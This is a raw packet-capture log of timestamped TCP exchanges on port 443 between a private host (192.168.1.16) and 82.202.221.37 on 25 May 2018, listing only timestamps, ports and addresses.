                Mai 25, 2018 16:10:02.681528091 MESZ4474919782.202.221.37192.168.1.16
                Mai 25, 2018 16:10:02.681634903 MESZ4474919782.202.221.37192.168.1.16
                Mai 25, 2018 16:10:02.681641102 MESZ4474919782.202.221.37192.168.1.16
                Mai 25, 2018 16:10:02.681683064 MESZ4474919782.202.221.37192.168.1.16
                Mai 25, 2018 16:10:02.681845903 MESZ49197447192.168.1.1682.202.221.37
                Mai 25, 2018 16:10:02.681860924 MESZ4474919782.202.221.37192.168.1.16
                Mai 25, 2018 16:10:02.681869984 MESZ4474919782.202.221.37192.168.1.16
                Mai 25, 2018 16:10:02.682430029 MESZ49197447192.168.1.1682.202.221.37
                Mai 25, 2018 16:10:02.683907986 MESZ4474919782.202.221.37192.168.1.16
                Mai 25, 2018 16:10:02.683944941 MESZ4474919782.202.221.37192.168.1.16
                Mai 25, 2018 16:10:02.683959007 MESZ4474919782.202.221.37192.168.1.16
                Mai 25, 2018 16:10:02.684124947 MESZ49197447192.168.1.1682.202.221.37
                Mai 25, 2018 16:10:02.692208052 MESZ4474919782.202.221.37192.168.1.16
                Mai 25, 2018 16:10:02.692256927 MESZ4474919782.202.221.37192.168.1.16
                Mai 25, 2018 16:10:02.692298889 MESZ4474919782.202.221.37192.168.1.16
                Mai 25, 2018 16:10:02.692326069 MESZ4474919782.202.221.37192.168.1.16
                Mai 25, 2018 16:10:02.692346096 MESZ4474919782.202.221.37192.168.1.16
                Mai 25, 2018 16:10:02.692478895 MESZ4474919782.202.221.37192.168.1.16
                Mai 25, 2018 16:10:02.692490101 MESZ49197447192.168.1.1682.202.221.37
                Mai 25, 2018 16:10:02.692501068 MESZ4474919782.202.221.37192.168.1.16
                Mai 25, 2018 16:10:02.692517042 MESZ4474919782.202.221.37192.168.1.16
                Mai 25, 2018 16:10:02.692539930 MESZ4474919782.202.221.37192.168.1.16
                Mai 25, 2018 16:10:02.692652941 MESZ49197447192.168.1.1682.202.221.37
                Mai 25, 2018 16:10:02.694844961 MESZ4474919782.202.221.37192.168.1.16
                Mai 25, 2018 16:10:02.694874048 MESZ4474919782.202.221.37192.168.1.16
                Mai 25, 2018 16:10:02.694993973 MESZ49197447192.168.1.1682.202.221.37
                Mai 25, 2018 16:10:02.700752020 MESZ49197447192.168.1.1682.202.221.37
                Mai 25, 2018 16:10:02.728794098 MESZ4474919782.202.221.37192.168.1.16
                Mai 25, 2018 16:10:02.728837013 MESZ4474919782.202.221.37192.168.1.16
                Mai 25, 2018 16:10:02.729057074 MESZ49197447192.168.1.1682.202.221.37
                Mai 25, 2018 16:10:02.737261057 MESZ4474919782.202.221.37192.168.1.16
                Mai 25, 2018 16:10:02.737287045 MESZ4474919782.202.221.37192.168.1.16
                Mai 25, 2018 16:10:02.737309933 MESZ4474919782.202.221.37192.168.1.16
                Mai 25, 2018 16:10:02.737329960 MESZ4474919782.202.221.37192.168.1.16
                Mai 25, 2018 16:10:02.737345934 MESZ4474919782.202.221.37192.168.1.16
                Mai 25, 2018 16:10:02.737349033 MESZ49197447192.168.1.1682.202.221.37
                Mai 25, 2018 16:10:02.737652063 MESZ49197447192.168.1.1682.202.221.37
                Mai 25, 2018 16:10:02.737669945 MESZ4474919782.202.221.37192.168.1.16
                Mai 25, 2018 16:10:02.740128040 MESZ4474919782.202.221.37192.168.1.16
                Mai 25, 2018 16:10:02.740228891 MESZ49197447192.168.1.1682.202.221.37
                Mai 25, 2018 16:10:02.740247011 MESZ4474919782.202.221.37192.168.1.16
                Mai 25, 2018 16:10:02.750317097 MESZ4474919782.202.221.37192.168.1.16
                Mai 25, 2018 16:10:02.750343084 MESZ4474919782.202.221.37192.168.1.16
                Mai 25, 2018 16:10:02.751142979 MESZ49197447192.168.1.1682.202.221.37
                Mai 25, 2018 16:10:02.751163006 MESZ4474919782.202.221.37192.168.1.16
                Mai 25, 2018 16:10:02.753071070 MESZ4474919782.202.221.37192.168.1.16
                Mai 25, 2018 16:10:02.753088951 MESZ4474919782.202.221.37192.168.1.16
                Mai 25, 2018 16:10:02.755373001 MESZ49197447192.168.1.1682.202.221.37
                Mai 25, 2018 16:10:02.755390882 MESZ4474919782.202.221.37192.168.1.16
                Mai 25, 2018 16:10:02.763176918 MESZ4474919782.202.221.37192.168.1.16
                Mai 25, 2018 16:10:02.763215065 MESZ4474919782.202.221.37192.168.1.16
                Mai 25, 2018 16:10:02.763236046 MESZ4474919782.202.221.37192.168.1.16
                Mai 25, 2018 16:10:02.763251066 MESZ4474919782.202.221.37192.168.1.16
                Mai 25, 2018 16:10:02.763268948 MESZ4474919782.202.221.37192.168.1.16
                Mai 25, 2018 16:10:02.763396025 MESZ4474919782.202.221.37192.168.1.16
                Mai 25, 2018 16:10:02.763418913 MESZ4474919782.202.221.37192.168.1.16
                Mai 25, 2018 16:10:02.763509035 MESZ49197447192.168.1.1682.202.221.37
                Mai 25, 2018 16:10:02.763536930 MESZ4474919782.202.221.37192.168.1.16
                Mai 25, 2018 16:10:02.765688896 MESZ4474919782.202.221.37192.168.1.16
                Mai 25, 2018 16:10:02.765708923 MESZ4474919782.202.221.37192.168.1.16
                Mai 25, 2018 16:10:02.765721083 MESZ4474919782.202.221.37192.168.1.16
                Mai 25, 2018 16:10:02.765825987 MESZ49197447192.168.1.1682.202.221.37
                Mai 25, 2018 16:10:02.765852928 MESZ4474919782.202.221.37192.168.1.16
                Mai 25, 2018 16:10:02.789587975 MESZ4474919782.202.221.37192.168.1.16
                Mai 25, 2018 16:10:02.789628983 MESZ4474919782.202.221.37192.168.1.16
                Mai 25, 2018 16:10:02.789721966 MESZ49197447192.168.1.1682.202.221.37
                Mai 25, 2018 16:10:02.789751053 MESZ4474919782.202.221.37192.168.1.16
                Mai 25, 2018 16:10:02.792231083 MESZ4474919782.202.221.37192.168.1.16
                Mai 25, 2018 16:10:02.792265892 MESZ4474919782.202.221.37192.168.1.16
                Mai 25, 2018 16:10:02.792346001 MESZ49197447192.168.1.1682.202.221.37
                Mai 25, 2018 16:10:02.792371988 MESZ4474919782.202.221.37192.168.1.16
                Mai 25, 2018 16:10:02.801282883 MESZ4474919782.202.221.37192.168.1.16
                Mai 25, 2018 16:10:02.801312923 MESZ4474919782.202.221.37192.168.1.16
                Mai 25, 2018 16:10:02.801616907 MESZ49197447192.168.1.1682.202.221.37
                Mai 25, 2018 16:10:02.801666021 MESZ4474919782.202.221.37192.168.1.16
                Mai 25, 2018 16:10:02.803975105 MESZ4474919782.202.221.37192.168.1.16
                Mai 25, 2018 16:10:02.803997040 MESZ4474919782.202.221.37192.168.1.16
                Mai 25, 2018 16:10:02.804013014 MESZ4474919782.202.221.37192.168.1.16
                Mai 25, 2018 16:10:02.804088116 MESZ49197447192.168.1.1682.202.221.37
                Mai 25, 2018 16:10:02.804107904 MESZ4474919782.202.221.37192.168.1.16
                Mai 25, 2018 16:10:02.813146114 MESZ4474919782.202.221.37192.168.1.16
                Mai 25, 2018 16:10:02.813193083 MESZ4474919782.202.221.37192.168.1.16
                Mai 25, 2018 16:10:02.813209057 MESZ4474919782.202.221.37192.168.1.16
                Mai 25, 2018 16:10:02.813220024 MESZ4474919782.202.221.37192.168.1.16
                Mai 25, 2018 16:10:02.813232899 MESZ4474919782.202.221.37192.168.1.16
                Mai 25, 2018 16:10:02.813368082 MESZ49197447192.168.1.1682.202.221.37
                Mai 25, 2018 16:10:02.813442945 MESZ4474919782.202.221.37192.168.1.16
                Mai 25, 2018 16:10:02.813469887 MESZ4474919782.202.221.37192.168.1.16
                Mai 25, 2018 16:10:02.813487053 MESZ4474919782.202.221.37192.168.1.16
                Mai 25, 2018 16:10:02.813977003 MESZ4474919782.202.221.37192.168.1.16
                Mai 25, 2018 16:10:02.814001083 MESZ4474919782.202.221.37192.168.1.16
                Mai 25, 2018 16:10:02.814012051 MESZ4474919782.202.221.37192.168.1.16
                Mai 25, 2018 16:10:02.814130068 MESZ49197447192.168.1.1682.202.221.37
                Mai 25, 2018 16:10:02.814166069 MESZ4474919782.202.221.37192.168.1.16
                Mai 25, 2018 16:10:02.815738916 MESZ4474919782.202.221.37192.168.1.16
                Mai 25, 2018 16:10:02.815761089 MESZ4474919782.202.221.37192.168.1.16
                Mai 25, 2018 16:10:02.815771103 MESZ4474919782.202.221.37192.168.1.16
                Mai 25, 2018 16:10:02.815865040 MESZ49197447192.168.1.1682.202.221.37
                Mai 25, 2018 16:10:02.815901041 MESZ4474919782.202.221.37192.168.1.16
                Mai 25, 2018 16:10:02.818015099 MESZ49197447192.168.1.1682.202.221.37
                Mai 25, 2018 16:10:02.862231016 MESZ4474919782.202.221.37192.168.1.16
                Mai 25, 2018 16:10:02.862278938 MESZ4474919782.202.221.37192.168.1.16
                Mai 25, 2018 16:10:02.862293005 MESZ4474919782.202.221.37192.168.1.16
                Mai 25, 2018 16:10:02.862375021 MESZ49197447192.168.1.1682.202.221.37
                Mai 25, 2018 16:10:02.876115084 MESZ4474919782.202.221.37192.168.1.16
                Mai 25, 2018 16:10:02.876168966 MESZ4474919782.202.221.37192.168.1.16
                Mai 25, 2018 16:10:02.876185894 MESZ4474919782.202.221.37192.168.1.16
                Mai 25, 2018 16:10:02.876286030 MESZ49197447192.168.1.1682.202.221.37
                Mai 25, 2018 16:10:02.878914118 MESZ4474919782.202.221.37192.168.1.16
                Mai 25, 2018 16:10:02.878958941 MESZ4474919782.202.221.37192.168.1.16
                Mai 25, 2018 16:10:02.879106998 MESZ49197447192.168.1.1682.202.221.37
                Mai 25, 2018 16:10:02.896668911 MESZ4474919782.202.221.37192.168.1.16
                Mai 25, 2018 16:10:02.896706104 MESZ4474919782.202.221.37192.168.1.16
                Mai 25, 2018 16:10:02.896714926 MESZ4474919782.202.221.37192.168.1.16
                Mai 25, 2018 16:10:02.897063971 MESZ49197447192.168.1.1682.202.221.37
                Mai 25, 2018 16:10:02.899569988 MESZ4474919782.202.221.37192.168.1.16
                Mai 25, 2018 16:10:02.899593115 MESZ4474919782.202.221.37192.168.1.16
                Mai 25, 2018 16:10:02.899600029 MESZ4474919782.202.221.37192.168.1.16
                Mai 25, 2018 16:10:02.899848938 MESZ49197447192.168.1.1682.202.221.37
                Mai 25, 2018 16:10:02.922100067 MESZ4474919782.202.221.37192.168.1.16
                Mai 25, 2018 16:10:02.922125101 MESZ4474919782.202.221.37192.168.1.16
                Mai 25, 2018 16:10:02.922135115 MESZ4474919782.202.221.37192.168.1.16
                Mai 25, 2018 16:10:02.922147989 MESZ4474919782.202.221.37192.168.1.16
                Mai 25, 2018 16:10:02.922157049 MESZ4474919782.202.221.37192.168.1.16
                Mai 25, 2018 16:10:02.922245026 MESZ4474919782.202.221.37192.168.1.16
                Mai 25, 2018 16:10:02.922260046 MESZ4474919782.202.221.37192.168.1.16
                Mai 25, 2018 16:10:02.922266960 MESZ4474919782.202.221.37192.168.1.16
                Mai 25, 2018 16:10:02.922377110 MESZ49197447192.168.1.1682.202.221.37
                Mai 25, 2018 16:10:02.922395945 MESZ4474919782.202.221.37192.168.1.16
                Mai 25, 2018 16:10:02.922893047 MESZ49197447192.168.1.1682.202.221.37
                Mai 25, 2018 16:10:02.924604893 MESZ4474919782.202.221.37192.168.1.16
                Mai 25, 2018 16:10:02.924623013 MESZ4474919782.202.221.37192.168.1.16
                Mai 25, 2018 16:10:02.924631119 MESZ4474919782.202.221.37192.168.1.16
                Mai 25, 2018 16:10:02.924742937 MESZ4474919782.202.221.37192.168.1.16
                Mai 25, 2018 16:10:02.924751043 MESZ4474919782.202.221.37192.168.1.16
                Mai 25, 2018 16:10:02.924757957 MESZ4474919782.202.221.37192.168.1.16
                Mai 25, 2018 16:10:02.924767017 MESZ4474919782.202.221.37192.168.1.16
                Mai 25, 2018 16:10:02.924773932 MESZ4474919782.202.221.37192.168.1.16
                Mai 25, 2018 16:10:02.924865961 MESZ49197447192.168.1.1682.202.221.37
                Mai 25, 2018 16:10:02.924887896 MESZ4474919782.202.221.37192.168.1.16
                Mai 25, 2018 16:10:02.925334930 MESZ49197447192.168.1.1682.202.221.37
                Mai 25, 2018 16:10:02.934895039 MESZ4474919782.202.221.37192.168.1.16
                Mai 25, 2018 16:10:02.934921980 MESZ4474919782.202.221.37192.168.1.16
                Mai 25, 2018 16:10:02.934936047 MESZ4474919782.202.221.37192.168.1.16
                Mai 25, 2018 16:10:02.934948921 MESZ4474919782.202.221.37192.168.1.16
                Mai 25, 2018 16:10:02.934969902 MESZ4474919782.202.221.37192.168.1.16
                Mai 25, 2018 16:10:02.935041904 MESZ49197447192.168.1.1682.202.221.37
                Mai 25, 2018 16:10:02.935061932 MESZ4474919782.202.221.37192.168.1.16
                Mai 25, 2018 16:10:02.935157061 MESZ4474919782.202.221.37192.168.1.16
                Mai 25, 2018 16:10:02.935182095 MESZ4474919782.202.221.37192.168.1.16
                Mai 25, 2018 16:10:02.935298920 MESZ49197447192.168.1.1682.202.221.37
                Mai 25, 2018 16:10:02.935318947 MESZ4474919782.202.221.37192.168.1.16
                Mai 25, 2018 16:10:02.937444925 MESZ4474919782.202.221.37192.168.1.16
                Mai 25, 2018 16:10:02.937463045 MESZ4474919782.202.221.37192.168.1.16
                Mai 25, 2018 16:10:02.937542915 MESZ49197447192.168.1.1682.202.221.37
                Mai 25, 2018 16:10:02.937566042 MESZ4474919782.202.221.37192.168.1.16
                Mai 25, 2018 16:10:02.971610069 MESZ4474919782.202.221.37192.168.1.16
                Mai 25, 2018 16:10:02.971635103 MESZ4474919782.202.221.37192.168.1.16
                Mai 25, 2018 16:10:02.971653938 MESZ4474919782.202.221.37192.168.1.16
                Mai 25, 2018 16:10:02.971667051 MESZ4474919782.202.221.37192.168.1.16
                Mai 25, 2018 16:10:02.971677065 MESZ4474919782.202.221.37192.168.1.16
                Mai 25, 2018 16:10:02.971702099 MESZ49197447192.168.1.1682.202.221.37
                Mai 25, 2018 16:10:02.971730947 MESZ4474919782.202.221.37192.168.1.16
                Mai 25, 2018 16:10:02.971822023 MESZ4474919782.202.221.37192.168.1.16
                Mai 25, 2018 16:10:02.971839905 MESZ4474919782.202.221.37192.168.1.16
                Mai 25, 2018 16:10:02.971945047 MESZ49197447192.168.1.1682.202.221.37
                Mai 25, 2018 16:10:02.971968889 MESZ4474919782.202.221.37192.168.1.16
                Mai 25, 2018 16:10:02.972562075 MESZ4474919782.202.221.37192.168.1.16
                Mai 25, 2018 16:10:02.972583055 MESZ4474919782.202.221.37192.168.1.16
                Mai 25, 2018 16:10:02.972593069 MESZ4474919782.202.221.37192.168.1.16
                Mai 25, 2018 16:10:02.972656012 MESZ49197447192.168.1.1682.202.221.37
                Mai 25, 2018 16:10:02.972680092 MESZ4474919782.202.221.37192.168.1.16
                Mai 25, 2018 16:10:02.972701073 MESZ4474919782.202.221.37192.168.1.16
                Mai 25, 2018 16:10:02.972719908 MESZ4474919782.202.221.37192.168.1.16
                Mai 25, 2018 16:10:02.972732067 MESZ4474919782.202.221.37192.168.1.16
                Mai 25, 2018 16:10:02.972745895 MESZ4474919782.202.221.37192.168.1.16
                Mai 25, 2018 16:10:02.972754955 MESZ4474919782.202.221.37192.168.1.16
                Mai 25, 2018 16:10:02.972853899 MESZ49197447192.168.1.1682.202.221.37
                Mai 25, 2018 16:10:02.972877026 MESZ4474919782.202.221.37192.168.1.16
                Mai 25, 2018 16:10:02.995605946 MESZ4474919782.202.221.37192.168.1.16
                Mai 25, 2018 16:10:02.995636940 MESZ4474919782.202.221.37192.168.1.16
                Mai 25, 2018 16:10:02.995644093 MESZ4474919782.202.221.37192.168.1.16
                Mai 25, 2018 16:10:02.995655060 MESZ4474919782.202.221.37192.168.1.16
                Mai 25, 2018 16:10:02.995666981 MESZ4474919782.202.221.37192.168.1.16
                Mai 25, 2018 16:10:02.995773077 MESZ49197447192.168.1.1682.202.221.37
                Mai 25, 2018 16:10:02.995800972 MESZ4474919782.202.221.37192.168.1.16
                Mai 25, 2018 16:10:02.995822906 MESZ4474919782.202.221.37192.168.1.16
                Mai 25, 2018 16:10:02.995840073 MESZ4474919782.202.221.37192.168.1.16
                Mai 25, 2018 16:10:02.995898962 MESZ49197447192.168.1.1682.202.221.37
                Mai 25, 2018 16:10:02.995915890 MESZ4474919782.202.221.37192.168.1.16
                Mai 25, 2018 16:10:02.998275995 MESZ4474919782.202.221.37192.168.1.16
                Mai 25, 2018 16:10:02.998296022 MESZ4474919782.202.221.37192.168.1.16
                Mai 25, 2018 16:10:02.998310089 MESZ4474919782.202.221.37192.168.1.16
                Mai 25, 2018 16:10:02.998394012 MESZ49197447192.168.1.1682.202.221.37
                Mai 25, 2018 16:10:02.998415947 MESZ4474919782.202.221.37192.168.1.16
                Mai 25, 2018 16:10:03.020529032 MESZ4474919782.202.221.37192.168.1.16
                Mai 25, 2018 16:10:03.020559072 MESZ4474919782.202.221.37192.168.1.16
                Mai 25, 2018 16:10:03.020570040 MESZ4474919782.202.221.37192.168.1.16
                Mai 25, 2018 16:10:03.020608902 MESZ4474919782.202.221.37192.168.1.16
                Mai 25, 2018 16:10:03.020618916 MESZ4474919782.202.221.37192.168.1.16
                Mai 25, 2018 16:10:03.020685911 MESZ49197447192.168.1.1682.202.221.37
                Mai 25, 2018 16:10:03.020701885 MESZ4474919782.202.221.37192.168.1.16
                Mai 25, 2018 16:10:03.020730972 MESZ4474919782.202.221.37192.168.1.16
                Mai 25, 2018 16:10:03.020747900 MESZ4474919782.202.221.37192.168.1.16
                Mai 25, 2018 16:10:03.020800114 MESZ49197447192.168.1.1682.202.221.37
                Mai 25, 2018 16:10:03.021567106 MESZ4474919782.202.221.37192.168.1.16
                Mai 25, 2018 16:10:03.021584988 MESZ4474919782.202.221.37192.168.1.16
                Mai 25, 2018 16:10:03.021591902 MESZ4474919782.202.221.37192.168.1.16
                Mai 25, 2018 16:10:03.021641970 MESZ49197447192.168.1.1682.202.221.37
                Mai 25, 2018 16:10:03.021665096 MESZ4474919782.202.221.37192.168.1.16
                Mai 25, 2018 16:10:03.023176908 MESZ4474919782.202.221.37192.168.1.16
                Mai 25, 2018 16:10:03.023196936 MESZ4474919782.202.221.37192.168.1.16
                Mai 25, 2018 16:10:03.023272038 MESZ49197447192.168.1.1682.202.221.37
                Mai 25, 2018 16:10:03.023296118 MESZ4474919782.202.221.37192.168.1.16
                Mai 25, 2018 16:10:03.032728910 MESZ4474919782.202.221.37192.168.1.16
                Mai 25, 2018 16:10:03.032757044 MESZ4474919782.202.221.37192.168.1.16
                Mai 25, 2018 16:10:03.032810926 MESZ49197447192.168.1.1682.202.221.37
                Mai 25, 2018 16:10:03.032835960 MESZ4474919782.202.221.37192.168.1.16
                Mai 25, 2018 16:10:03.056078911 MESZ4474919782.202.221.37192.168.1.16
                Mai 25, 2018 16:10:03.056108952 MESZ4474919782.202.221.37192.168.1.16
                Mai 25, 2018 16:10:03.056117058 MESZ4474919782.202.221.37192.168.1.16
                Mai 25, 2018 16:10:03.056143045 MESZ4474919782.202.221.37192.168.1.16
                Mai 25, 2018 16:10:03.056159973 MESZ4474919782.202.221.37192.168.1.16
                Mai 25, 2018 16:10:03.056195021 MESZ49197447192.168.1.1682.202.221.37
                Mai 25, 2018 16:10:03.056224108 MESZ4474919782.202.221.37192.168.1.16
                Mai 25, 2018 16:10:03.056245089 MESZ4474919782.202.221.37192.168.1.16
                Mai 25, 2018 16:10:03.056271076 MESZ4474919782.202.221.37192.168.1.16
                Mai 25, 2018 16:10:03.056355000 MESZ49197447192.168.1.1682.202.221.37
                Mai 25, 2018 16:10:03.056374073 MESZ4474919782.202.221.37192.168.1.16
                Mai 25, 2018 16:10:03.058723927 MESZ4474919782.202.221.37192.168.1.16
                Mai 25, 2018 16:10:03.058743000 MESZ4474919782.202.221.37192.168.1.16
                Mai 25, 2018 16:10:03.058800936 MESZ49197447192.168.1.1682.202.221.37
                Mai 25, 2018 16:10:03.058820963 MESZ4474919782.202.221.37192.168.1.16
                Mai 25, 2018 16:10:03.080219030 MESZ4474919782.202.221.37192.168.1.16
                Mai 25, 2018 16:10:03.080250025 MESZ4474919782.202.221.37192.168.1.16
                Mai 25, 2018 16:10:03.080260038 MESZ4474919782.202.221.37192.168.1.16
                Mai 25, 2018 16:10:03.080269098 MESZ4474919782.202.221.37192.168.1.16
                Mai 25, 2018 16:10:03.080316067 MESZ49197447192.168.1.1682.202.221.37
                Mai 25, 2018 16:10:03.080337048 MESZ4474919782.202.221.37192.168.1.16
                Mai 25, 2018 16:10:03.080395937 MESZ4474919782.202.221.37192.168.1.16
                Mai 25, 2018 16:10:03.080409050 MESZ4474919782.202.221.37192.168.1.16
                Mai 25, 2018 16:10:03.080466032 MESZ49197447192.168.1.1682.202.221.37
                Mai 25, 2018 16:10:03.080480099 MESZ4474919782.202.221.37192.168.1.16
                Mai 25, 2018 16:10:03.080954075 MESZ4474919782.202.221.37192.168.1.16
                Mai 25, 2018 16:10:03.080971003 MESZ4474919782.202.221.37192.168.1.16
                Mai 25, 2018 16:10:03.080981970 MESZ4474919782.202.221.37192.168.1.16
                Mai 25, 2018 16:10:03.081026077 MESZ49197447192.168.1.1682.202.221.37
                Mai 25, 2018 16:10:03.081043959 MESZ4474919782.202.221.37192.168.1.16
                Mai 25, 2018 16:10:03.081059933 MESZ4474919782.202.221.37192.168.1.16
                Mai 25, 2018 16:10:03.081074953 MESZ4474919782.202.221.37192.168.1.16
                Mai 25, 2018 16:10:03.081124067 MESZ49197447192.168.1.1682.202.221.37
                Mai 25, 2018 16:10:03.081139088 MESZ4474919782.202.221.37192.168.1.16
                Mai 25, 2018 16:10:03.082884073 MESZ4474919782.202.221.37192.168.1.16
                Mai 25, 2018 16:10:03.082901001 MESZ4474919782.202.221.37192.168.1.16
                Mai 25, 2018 16:10:03.082962036 MESZ49197447192.168.1.1682.202.221.37
                Mai 25, 2018 16:10:03.082978010 MESZ4474919782.202.221.37192.168.1.16
                Mai 25, 2018 16:10:03.101475954 MESZ49197447192.168.1.1682.202.221.37
                Mai 25, 2018 16:10:03.106334925 MESZ4474919782.202.221.37192.168.1.16
                Mai 25, 2018 16:10:03.106360912 MESZ4474919782.202.221.37192.168.1.16
                Mai 25, 2018 16:10:03.106379986 MESZ4474919782.202.221.37192.168.1.16
                Mai 25, 2018 16:10:03.106414080 MESZ49197447192.168.1.1682.202.221.37
                Mai 25, 2018 16:10:03.109132051 MESZ4474919782.202.221.37192.168.1.16
                Mai 25, 2018 16:10:03.109162092 MESZ4474919782.202.221.37192.168.1.16
                Mai 25, 2018 16:10:03.109268904 MESZ49197447192.168.1.1682.202.221.37
                Mai 25, 2018 16:10:03.109292030 MESZ4474919782.202.221.37192.168.1.16
                Mai 25, 2018 16:10:03.169981003 MESZ4474919782.202.221.37192.168.1.16
                Mai 25, 2018 16:10:03.170012951 MESZ4474919782.202.221.37192.168.1.16
                Mai 25, 2018 16:10:03.170113087 MESZ49197447192.168.1.1682.202.221.37
                Mai 25, 2018 16:10:03.170135021 MESZ4474919782.202.221.37192.168.1.16
                Mai 25, 2018 16:10:03.181094885 MESZ4474919782.202.221.37192.168.1.16
                Mai 25, 2018 16:10:03.181126118 MESZ4474919782.202.221.37192.168.1.16
                Mai 25, 2018 16:10:03.181149960 MESZ4474919782.202.221.37192.168.1.16
                Mai 25, 2018 16:10:03.181171894 MESZ4474919782.202.221.37192.168.1.16
                Mai 25, 2018 16:10:03.181181908 MESZ4474919782.202.221.37192.168.1.16
                Mai 25, 2018 16:10:03.181190968 MESZ49197447192.168.1.1682.202.221.37
                Mai 25, 2018 16:10:03.181210995 MESZ4474919782.202.221.37192.168.1.16
                Mai 25, 2018 16:10:03.181287050 MESZ4474919782.202.221.37192.168.1.16
                Mai 25, 2018 16:10:03.181303978 MESZ4474919782.202.221.37192.168.1.16
                Mai 25, 2018 16:10:03.181416035 MESZ49197447192.168.1.1682.202.221.37
                Mai 25, 2018 16:10:03.181436062 MESZ4474919782.202.221.37192.168.1.16
                Mai 25, 2018 16:10:03.183796883 MESZ4474919782.202.221.37192.168.1.16
                Mai 25, 2018 16:10:03.183816910 MESZ4474919782.202.221.37192.168.1.16
                Mai 25, 2018 16:10:03.183906078 MESZ49197447192.168.1.1682.202.221.37
                Mai 25, 2018 16:10:03.183924913 MESZ4474919782.202.221.37192.168.1.16
                Mai 25, 2018 16:10:03.225016117 MESZ4474919782.202.221.37192.168.1.16
                Mai 25, 2018 16:10:03.225047112 MESZ4474919782.202.221.37192.168.1.16
                Mai 25, 2018 16:10:03.225106001 MESZ49197447192.168.1.1682.202.221.37
                Mai 25, 2018 16:10:03.225136995 MESZ4474919782.202.221.37192.168.1.16
                Mai 25, 2018 16:10:03.237019062 MESZ4474919782.202.221.37192.168.1.16
                Mai 25, 2018 16:10:03.237052917 MESZ4474919782.202.221.37192.168.1.16
                Mai 25, 2018 16:10:03.237128019 MESZ49197447192.168.1.1682.202.221.37
                Mai 25, 2018 16:10:03.237155914 MESZ4474919782.202.221.37192.168.1.16
                Mai 25, 2018 16:10:03.300734043 MESZ4474919782.202.221.37192.168.1.16
                Mai 25, 2018 16:10:03.300761938 MESZ4474919782.202.221.37192.168.1.16
                Mai 25, 2018 16:10:03.300774097 MESZ4474919782.202.221.37192.168.1.16
                Mai 25, 2018 16:10:03.300784111 MESZ4474919782.202.221.37192.168.1.16
                Mai 25, 2018 16:10:03.300791979 MESZ4474919782.202.221.37192.168.1.16
                Mai 25, 2018 16:10:03.300916910 MESZ4474919782.202.221.37192.168.1.16
                Mai 25, 2018 16:10:03.300934076 MESZ4474919782.202.221.37192.168.1.16
                Mai 25, 2018 16:10:03.300951958 MESZ49197447192.168.1.1682.202.221.37
                Mai 25, 2018 16:10:03.300985098 MESZ4474919782.202.221.37192.168.1.16
                Mai 25, 2018 16:10:03.301067114 MESZ49197447192.168.1.1682.202.221.37
                Mai 25, 2018 16:10:03.301198959 MESZ4474919782.202.221.37192.168.1.16
                Mai 25, 2018 16:10:03.301213026 MESZ4474919782.202.221.37192.168.1.16
                Mai 25, 2018 16:10:03.301219940 MESZ4474919782.202.221.37192.168.1.16
                Mai 25, 2018 16:10:03.301321030 MESZ49197447192.168.1.1682.202.221.37
                Mai 25, 2018 16:10:03.301325083 MESZ4474919782.202.221.37192.168.1.16
                Mai 25, 2018 16:10:03.301337957 MESZ4474919782.202.221.37192.168.1.16
                Mai 25, 2018 16:10:03.301348925 MESZ4474919782.202.221.37192.168.1.16
                Mai 25, 2018 16:10:03.301357031 MESZ4474919782.202.221.37192.168.1.16
                Mai 25, 2018 16:10:03.301363945 MESZ4474919782.202.221.37192.168.1.16
                Mai 25, 2018 16:10:03.301456928 MESZ49197447192.168.1.1682.202.221.37
                Mai 25, 2018 16:10:03.301471949 MESZ4474919782.202.221.37192.168.1.16
                Mai 25, 2018 16:10:03.301497936 MESZ4474919782.202.221.37192.168.1.16
                Mai 25, 2018 16:10:03.301508904 MESZ4474919782.202.221.37192.168.1.16
                Mai 25, 2018 16:10:03.301518917 MESZ4474919782.202.221.37192.168.1.16
                Mai 25, 2018 16:10:03.301525116 MESZ4474919782.202.221.37192.168.1.16
                Mai 25, 2018 16:10:03.301532030 MESZ4474919782.202.221.37192.168.1.16
                Mai 25, 2018 16:10:03.301640987 MESZ49197447192.168.1.1682.202.221.37
                Mai 25, 2018 16:10:03.301660061 MESZ4474919782.202.221.37192.168.1.16
                Mai 25, 2018 16:10:03.303206921 MESZ49197447192.168.1.1682.202.221.37
                Mai 25, 2018 16:10:03.303407907 MESZ4474919782.202.221.37192.168.1.16
                Mai 25, 2018 16:10:03.369868994 MESZ4474919782.202.221.37192.168.1.16
                Mai 25, 2018 16:10:03.369894981 MESZ4474919782.202.221.37192.168.1.16
                Mai 25, 2018 16:10:03.369904995 MESZ4474919782.202.221.37192.168.1.16
                Mai 25, 2018 16:10:03.369911909 MESZ4474919782.202.221.37192.168.1.16
                Mai 25, 2018 16:10:03.369919062 MESZ4474919782.202.221.37192.168.1.16
                Mai 25, 2018 16:10:03.369995117 MESZ49197447192.168.1.1682.202.221.37
                Mai 25, 2018 16:10:03.369997025 MESZ4474919782.202.221.37192.168.1.16
                Mai 25, 2018 16:10:03.370013952 MESZ4474919782.202.221.37192.168.1.16
                Mai 25, 2018 16:10:03.370032072 MESZ4474919782.202.221.37192.168.1.16
                Mai 25, 2018 16:10:03.370384932 MESZ49197447192.168.1.1682.202.221.37
                Mai 25, 2018 16:10:03.371232033 MESZ4474919782.202.221.37192.168.1.16
                Mai 25, 2018 16:10:03.371269941 MESZ4474919782.202.221.37192.168.1.16
                Mai 25, 2018 16:10:03.371279001 MESZ4474919782.202.221.37192.168.1.16
                Mai 25, 2018 16:10:03.371388912 MESZ49197447192.168.1.1682.202.221.37
                Mai 25, 2018 16:10:03.371423960 MESZ4474919782.202.221.37192.168.1.16
                Mai 25, 2018 16:10:03.371462107 MESZ4474919782.202.221.37192.168.1.16
                Mai 25, 2018 16:10:03.371476889 MESZ4474919782.202.221.37192.168.1.16
                Mai 25, 2018 16:10:03.371488094 MESZ4474919782.202.221.37192.168.1.16
                Mai 25, 2018 16:10:03.371498108 MESZ4474919782.202.221.37192.168.1.16
                Mai 25, 2018 16:10:03.371504068 MESZ4474919782.202.221.37192.168.1.16
                Mai 25, 2018 16:10:03.371577978 MESZ49197447192.168.1.1682.202.221.37
                Mai 25, 2018 16:10:03.371604919 MESZ4474919782.202.221.37192.168.1.16
                Mai 25, 2018 16:10:03.371635914 MESZ4474919782.202.221.37192.168.1.16
                Mai 25, 2018 16:10:03.371648073 MESZ4474919782.202.221.37192.168.1.16
                Mai 25, 2018 16:10:03.371656895 MESZ4474919782.202.221.37192.168.1.16
                Mai 25, 2018 16:10:03.371664047 MESZ4474919782.202.221.37192.168.1.16
